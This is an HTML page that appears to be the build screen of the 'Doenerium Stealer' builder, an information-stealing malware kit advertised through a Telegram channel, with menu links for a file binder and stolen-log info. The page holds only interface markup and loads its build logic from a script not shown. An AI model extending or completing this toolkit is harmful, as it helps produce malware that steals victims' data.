<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8" />
    <link rel="stylesheet" href="style/style_build.css">
    <link href='https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css' rel='stylesheet'>
    <title>Doenerium Stealer Builder | t.me/doenerium69</title>
</head>

<body>
    <!-- Sidebar -->
    <nav class="sidebar">
        <div class="logo-menu">
            <h2 class="logo">Doenerium Stealer</h2>
            <i class="bx bx-menu toggle-btn"></i>
        </div>
        <ul class="list">
            <li class="list-item">
                <a href="index.html">
                    <i class='bx bx-grid-alt'></i>
                    <span class="link_name" style="--i:1">Features</span>
                </a>
            </li>
            <li class="list-item">
                <a href="binder.html">
                    <i class='bx bx-merge'></i>
                    <span class="link_name" style="--i:2">Binder</span>
                </a>
            </li>
            <li class="list-item">
                <a href="info.html">
                    <i class='bx bx-detail bx-flip-horizontal'></i>
                    <span class="link_name" style="--i:3">Log info</span>
                </a>
            </li>
            <li class="list-item active">
                <a href="build.html">
                    <i class="bx bx-check-shield bx-flashing"></i>
                    <span class="link_name" style="--i:4">Build</span>
                </a>
            </li>
            <li class="list-item">
                <a href="about.html">
                    <i class='bx bx-info-circle'></i>
                    <span class="link_name" style="--i:5">About</span>
                </a>
            </li>
        </ul>
    </nav>

    <div class="container">
        <div class="maintitle">
            <h1><i class="bx bx-check-shield"></i> Doenerium Builder</h1>
        </div>
        <button id="helpButton" class="help-button">
    <i class='bx bx-edit'></i>Ressources
</button>
<button id="newButton" class="new-button">
    <i class='bx bx-file-blank'></i>Default App
</button>

        <div class="outputContainer">
            <div class="outputBox" id="outputBox">
                [<span style="color: gray"> + <span style="color: white">] Doenerium - Builder - Version [0.8]<br>
                [<span style="color: gray"> + <span style="color: white">] Press "Build" button to continue...<br><br>
            </div>
        </div>
        <label class="selectButton" for="fileInput">Build&nbsp;<i class='bx bx-check-circle'> </i></label>
    </div>

    <script src="scripts/script_build.js"></script>
</body>

</html>